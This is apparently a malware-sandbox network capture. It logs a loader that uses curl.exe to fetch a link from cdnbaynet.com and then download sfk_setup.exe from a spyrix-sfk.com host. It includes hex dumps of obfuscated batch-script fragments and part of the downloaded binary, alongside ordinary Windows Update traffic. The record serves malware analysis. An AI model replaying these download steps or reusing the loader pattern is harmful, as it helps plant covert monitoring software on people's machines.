                                                                                                                                                                                                                                                          2024-10-02 04:25:26 UTC4096INData Raw: 25 66 68 6a 70 30 66 25 5c 25 66 6e 6f 6a 72 6f 74 71 73 61 6b 68 63 35 74 70 39 66 25 22 20 25 6c 6e 6b 25 0d 0a 72 65 6d 20 70 68 30 33 30 62 63 32 7a 6a 6e 63 68 77 38 75 6c 61 7a 69 6b 37 6b 6a 72 74 75 77 71 67 74 36 79 31 30 65 6b 34 64 78 36 39 71 67 30 68 79 34 76 63 35 33 6d 30 6a 31 30 79 73 68 65 6e 78 6c 69 0d 0a 72 65 6d 20 30 65 66 62 66 7a 69 75 79 63 71 33 63 74 66 32 70 6d 78 37 38 78 36 79 73 30 77 62 77 34 74 38 64 72 6f 70 6f 31 76 34 38 6f 34 72 72 30 70 30 71 6d 0d 0a 72 65 6d 20 70 31 38 62 31 31 62 73 6f 6a 39 65 35 77 70 74 31 61 6f 63 30 36 65 79 34 36 74 66 39 79 36 64 36 6b 69 78 38 36 6b 73 39 6f 64 71 6c 7a 7a 79 76 69 76 61 73 76 6b 64 35 73 6c 72 63 73 30 70 6a 67 6d 6f 74 74 78 30 38 63 76 71 77 78 63 69 73 63 65 7a 68 65
                                                                                                                                                                                                                                                          Data Ascii: %fhjp0f%\%fnojrotqsakhc5tp9f%" %lnk%rem ph030bc2zjnchw8ulazik7kjrtuwqgt6y10ek4dx69qg0hy4vc53m0j10yshenxlirem 0efbfziuycq3ctf2pmx78x6ys0wbw4t8dropo1v48o4rr0p0qmrem p18b11bsoj9e5wpt1aoc06ey46tf9y6d6kix86ks9odqlzzyvivasvkd5slrcs0pjgmottx08cvqwxciscezhe
                                                                                                                                                                                                                                                          2024-10-02 04:25:26 UTC1539INData Raw: 72 65 6d 20 75 36 76 6c 33 61 6e 30 34 6e 30 6b 6b 30 63 71 76 75 78 74 79 77 31 76 62 63 36 76 30 31 79 35 39 38 6e 77 72 34 64 62 75 30 66 30 6e 6d 38 68 7a 68 70 79 6d 73 71 6a 30 64 74 38 38 38 62 36 66 6c 39 36 36 6d 64 32 63 6b 72 73 39 33 37 63 72 61 6f 6a 33 63 0d 0a 29 0d 0a 72 65 6d 20 6e 71 72 66 67 34 6b 68 69 70 38 32 6c 70 66 79 6c 65 61 66 72 6d 63 34 6e 77 67 78 73 61 61 7a 30 75 78 62 32 6a 65 67 77 30 7a 75 68 69 30 6c 63 6b 6b 61 62 38 6d 72 6f 6d 78 72 33 30 64 69 33 67 30 36 6a 72 72 68 71 38 63 74 76 31 63 74 62 39 6c 68 6d 71 73 6c 34 6f 6a 6a 30 34 65 33 77 39 35 72 37 77 68 6f 31 68 66 30 68 0d 0a 72 65 6d 20 6c 6d 30 6a 65 6a 76 73 34 65 30 78 70 30 66 6f 34 6d 77 69 36 75 30 73 6f 7a 76 61 64 64 62 71 64 65 32 73 78 70 37 33 7a
                                                                                                                                                                                                                                                          Data Ascii: rem u6vl3an04n0kk0cqvuxtyw1vbc6v01y598nwr4dbu0f0nm8hzhpymsqj0dt888b6fl966md2ckrs937craoj3c)rem nqrfg4khip82lpfyleafrmc4nwgxsaaz0uxb2jegw0zuhi0lckkab8mromxr30di3g06jrrhq8ctv1ctb9lhmqsl4ojj04e3w95r7who1hf0hrem lm0jejvs4e0xp0fo4mwi6u0sozvaddbqde2sxp73z


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          1192.168.2.749706184.28.90.27443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:25:30 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                                                                                                                                          2024-10-02 04:25:30 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                          Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                          X-CID: 11
                                                                                                                                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                          X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                          Cache-Control: public, max-age=130820
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:25:30 GMT
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          X-CID: 2


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          2192.168.2.749707184.28.90.27443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:25:31 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                          Range: bytes=0-2147483646
                                                                                                                                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                                                                                                                                          2024-10-02 04:25:31 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                          Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                          X-CID: 11
                                                                                                                                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                          X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                          Cache-Control: public, max-age=130763
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:25:31 GMT
                                                                                                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          X-CID: 2
                                                                                                                                                                                                                                                          2024-10-02 04:25:31 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          3192.168.2.749710167.114.14.1704437320C:\Windows\SysWOW64\curl.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:25:38 UTC110OUTGET /loader/link.php?prg_id=sfk HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdnbaynet.com
                                                                                                                                                                                                                                                          User-Agent: sfk-dst-loader-2.0
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          2024-10-02 04:25:39 UTC165INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.17.3
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:25:39 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2024-10-02 04:25:39 UTC74INData Raw: 33 66 0d 0a 68 74 74 70 73 3a 2f 2f 73 77 74 62 2d 64 6f 77 6e 6c 6f 61 64 2e 73 70 79 72 69 78 2d 73 66 6b 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 73 66 6b 2f 73 66 6b 5f 73 65 74 75 70 2e 65 78 65 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 3fhttps://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          4192.168.2.749713167.114.14.1684437352C:\Windows\SysWOW64\curl.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:25:39 UTC125OUTGET /download/sfk/sfk_setup.exe HTTP/1.1
                                                                                                                                                                                                                                                          Host: swtb-download.spyrix-sfk.com
                                                                                                                                                                                                                                                          User-Agent: sfk-dst-loader-2.0
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          2024-10-02 04:25:40 UTC380INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.17.3
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:25:40 GMT
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 33441448
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Wed, 02 Oct 2024 04:09:15 GMT
                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="sfk_setup.exe"
                                                                                                                                                                                                                                                          ETag: "66fcc76b-1fe46a8"
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          2024-10-02 04:25:40 UTC16004INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                                                                                          2024-10-02 04:25:40 UTC16384INData Raw: 08 c7 ff ff c3 8d 40 00 8b 10 85 d2 74 0e c7 00 00 00 00 00 50 52 e8 f1 c6 ff ff 58 c3 8d 40 00 53 56 89 c3 89 d6 8b 03 85 c0 74 0c c7 03 00 00 00 00 50 e8 d4 c6 ff ff 83 c3 04 4e 75 e8 5e 5b c3 8d 40 00 39 10 74 23 85 d2 0f 84 b8 ff ff ff 8b 4a fc d1 e9 0f 84 ad ff ff ff 51 52 50 e8 a1 c6 ff ff 85 c0 0f 84 6d ff ff ff c3 55 8b ec 81 c4 04 f0 ff ff 50 83 c4 fc 53 56 57 8b f1 89 55 fc 8b f8 85 f6 7f 09 8b c7 e8 7a ff ff ff eb 6c 8d 46 01 3d ff 07 00 00 7d 2f 56 8b 45 08 50 8d 85 fc ef ff ff 8b 4d fc ba ff 07 00 00 e8 b6 fc ff ff 8b d8 85 db 7e 11 8d 95 fc ef ff ff 8b c7 8b cb e8 51 00 00 00 eb 33 8d 5e 01 8b c7 8b d3 e8 d3 00 00 00 56 8b 45 08 50 8b 07 e8 b7 00 00 00 8b 4d fc 8b d3 e8 7d fc ff ff 8b d8 85 db 7d 02 33 db 8b c7 8b d3 e8 ac 00 00 00 5f 5e 5b
                                                                                                                                                                                                                                                          Data Ascii: @tPRX@SVtPNu^[@9t#JQRPmUPSVWUzlF=}/VEPM~Q3^VEPM}}3_^[
                                                                                                                                                                                                                                                          2024-10-02 04:25:40 UTC16384INData Raw: 4e 32 e4 c3 80 7d dc 00 74 06 66 b8 2d 00 66 ab c3 e8 ee ff ff ff 0f bf 4d da 31 d2 3b 4d 0c 7f 25 83 f9 fd 7c 20 09 c9 7f 22 66 b8 30 00 66 ab 80 3e 00 74 4b 66 8b 45 f6 66 ab f7 d9 66 b8 30 00 f3 66 ab eb 20 b9 01 00 00 00 42 ac 08 c0 74 20 32 e4 66 ab e2 f5 ac 08 c0 74 1c 32 e4 c1 e0 10 66 8b 45 f6 ab ac 08 c0 74 0d 32 e4 66 ab eb f5 66 b8 30 00 f3 66 ab 09 d2 74 04 31 c0 eb 22 c3 e8 7e ff ff ff e8 6e ff ff ff 66 ab 66 8b 45 f6 66 ab 8b 4d 0c 49 e8 5d ff ff ff 66 ab e2 f7 b4 2b 8b 4d 08 83 f9 04 76 02 31 c9 b0 45 8a 5d dd b7 01 0f bf 55 da 4a e8 e3 fd ff ff c3 e8 41 ff ff ff 8b 55 08 83 fa 12 72 05 ba 12 00 00 00 0f bf 4d da 09 c9 7f 08 66 b8 30 00 66 ab eb 2e 31 db 80 7d 10 02 74 0a 89 c8 48 b3 03 f6 f3 88 e3 43 e8 02 ff ff ff 66 ab 49 74 12 4b 75 f3
                                                                                                                                                                                                                                                          Data Ascii: N2}tf-fM1;M%| "f0f>tKfEff0f Bt 2ft2fEt2ff0ft1"~nffEfMI]f+Mv1E]UJAUrMf0f.1}tHCfItKu
                                                                                                                                                                                                                                                          2024-10-02 04:25:40 UTC16384INData Raw: e8 ff 74 ff ff 5a 5e 5b c3 00 00 00 b0 04 02 00 ff ff ff ff 1d 00 00 00 43 00 6f 00 6d 00 70 00 72 00 65 00 73 00 73 00 65 00 64 00 20 00 62 00 6c 00 6f 00 63 00 6b 00 20 00 69 00 73 00 20 00 63 00 6f 00 72 00 72 00 75 00 70 00 74 00 65 00 64 00 00 00 53 56 57 55 51 8b f9 8b f0 33 c0 89 04 24 8b ea 85 ff 7e 3e 83 7e 18 00 75 0d 83 7e 0c 00 74 32 8b c6 e8 09 ff ff ff 8b df 3b 5e 18 76 03 8b 5e 18 8b d5 8b 46 14 8d 44 06 1c 8b cb e8 a3 64 ff ff 01 5e 14 29 5e 18 03 eb 2b fb 01 1c 24 85 ff 7f c2 8b 04 24 5a 5d 5f 5e 5b c3 90 53 56 57 8b f1 8b fa 8b d8 8b 43 04 85 c0 74 0b 8b d7 8b ce 8b 18 ff 53 04 eb 25 8b d7 8b ce 8b c3 e8 7e ff ff ff 3b f0 74 16 b9 84 cb 40 00 b2 01 a1 dc c4 40 00 e8 b5 cc ff ff e8 14 74 ff ff 5f 5e 5b c3 b0 04 02 00 ff ff ff ff 1d 00 00
                                                                                                                                                                                                                                                          Data Ascii: tZ^[Compressed block is corruptedSVWUQ3$~>~u~t2;^v^FDd^)^+$$Z]_^[SVWCtS%~;t@@t_^[
                                                                                                                                                                                                                                                          2024-10-02 04:25:40 UTC16384INData Raw: 41 00 68 7c 17 41 00 68 60 17 41 00 e8 83 50 ff ff 50 e8 8d 50 ff ff a3 20 85 41 00 83 3d 1c 85 41 00 00 74 09 83 3d 20 85 41 00 00 75 04 33 c0 eb 02 b0 01 a2 24 85 41 00 8d 45 f8 e8 0b a3 ff ff 8b 45 f8 8d 55 fc e8 10 9c ff ff 8d 45 fc ba c4 17 41 00 e8 bb 38 ff ff 8b 45 fc ba 00 80 00 00 e8 9a 95 ff ff 8d 55 f4 b8 fb 3a 78 4c e8 8d a8 ff ff 33 c0 5a 59 59 64 89 10 68 19 17 41 00 8d 45 f4 ba 03 00 00 00 e8 7f 35 ff ff c3 e9 91 27 ff ff eb eb 8b e5 5d c3 00 00 00 57 00 6f 00 77 00 36 00 34 00 44 00 69 00 73 00 61 00 62 00 6c 00 65 00 57 00 6f 00 77 00 36 00 34 00 46 00 73 00 52 00 65 00 64 00 69 00 72 00 65 00 63 00 74 00 69 00 6f 00 6e 00 00 00 00 00 6b 00 65 00 72 00 6e 00 65 00 6c 00 33 00 32 00 2e 00 64 00 6c 00 6c 00 00 00 00 00 57 00 6f 00 77 00 36
                                                                                                                                                                                                                                                          Data Ascii: Ah|Ah`APPP A=At= Au3$AEEUEA8EU:xL3ZYYdhAE5']Wow64DisableWow64FsRedirectionkernel32.dllWow6
                                                                                                                                                                                                                                                          2024-10-02 04:25:40 UTC16384INData Raw: 02 8d 22 b0 e3 2d 73 64 d6 ee 50 f8 ed b3 02 09 8b 0b af 10 c8 a4 fd 03 4b c6 c9 a5 ae db ef 8d 00 26 ce 56 c3 48 d1 4b 10 36 17 48 24 8c 19 42 38 8b 07 03 23 89 29 92 9a fe 8a c2 a2 0d 76 af 3f 91 da d8 6e bd ec 34 75 aa 50 ae cf 81 37 02 98 34 8d 1a a9 2c b5 5a 0b c0 5a 3d 80 a1 59 1e 61 ea c5 40 4e 26 77 05 a2 86 99 52 fd db 67 09 8a 2c bf 00 88 ee 2c 2e 94 ff e5 ba fd 06 6f 04 60 18 3f 2b f1 07 01 79 ad ed 38 c2 be d7 1d f3 9f 98 15 99 8b 5f 27 bc bd de f6 46 31 1a 89 2f 97 8e 95 f3 5d 9f 03 83 67 02 a8 1a 2c 90 b1 d0 76 58 4d 1b 29 fc ea 62 c9 63 01 11 62 c3 27 84 db 9e b6 b7 98 ca bf 21 da a0 12 38 a5 74 82 dc ef fa 1c 18 bc 12 c0 d8 99 94 93 09 b5 4c 77 03 ba da 8e 65 64 2f c2 65 83 b9 1b 10 05 cc 94 e9 ff 7e 5e e1 c3 8f ed 67 7d ba c3 f1 60 c9 b8
                                                                                                                                                                                                                                                          Data Ascii: "-sdPK&VHK6H$B8#)v?n4uP74,ZZ=Ya@N&wRg,,.o`?+y8_'F1/]g,vXM)bcb'!8tLwed/e~^g}`
                                                                                                                                                                                                                                                          2024-10-02 04:25:40 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe a4 62 1f fd 9e 64 dc ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff fd b0 80 ff fd e7 d8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ed e3 ff fd b6 8a ff ff a0 64 ff ff a0 64
                                                                                                                                                                                                                                                          Data Ascii: bddddddddddddddddddddddddd
                                                                                                                                                                                                                                                          2024-10-02 04:25:40 UTC16384INData Raw: ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff fd cc ad ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fb f9 ff fd d6 bd ff fe af 7e ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff fd c2 9d ff ff fe fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                          Data Ascii: ddddddddddddd~ddddddddddddddddddddddddddddddd
                                                                                                                                                                                                                                                          2024-10-02 04:25:40 UTC16384INData Raw: ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff fd cc ad ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe ea de ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64
                                                                                                                                                                                                                                                          Data Ascii: dddddddddddddddddddddddddddddddd
                                                                                                                                                                                                                                                          2024-10-02 04:25:40 UTC16384INData Raw: ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64 ff ff a0 64
                                                                                                                                                                                                                                                          Data Ascii: dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          5192.168.2.74971413.85.23.86443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:25:42 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=LgzHuDYMDELwvCA&MD=nDsdSsxd HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                          2024-10-02 04:25:42 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                          MS-CorrelationId: 2c5472a4-10a6-49b1-9c32-2269ddad134c
                                                                                                                                                                                                                                                          MS-RequestId: f24b84d4-4c3b-4b66-8f47-5d612b1dcb21
                                                                                                                                                                                                                                                          MS-CV: Q5zdSFzXQEKT/sSB.0
                                                                                                                                                                                                                                                          X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:25:41 GMT
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Content-Length: 24490
                                                                                                                                                                                                                                                          2024-10-02 04:25:42 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                          2024-10-02 04:25:42 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          6192.168.2.75500720.114.59.183443
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:26:26 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=LgzHuDYMDELwvCA&MD=nDsdSsxd HTTP/1.1
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                          2024-10-02 04:26:27 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
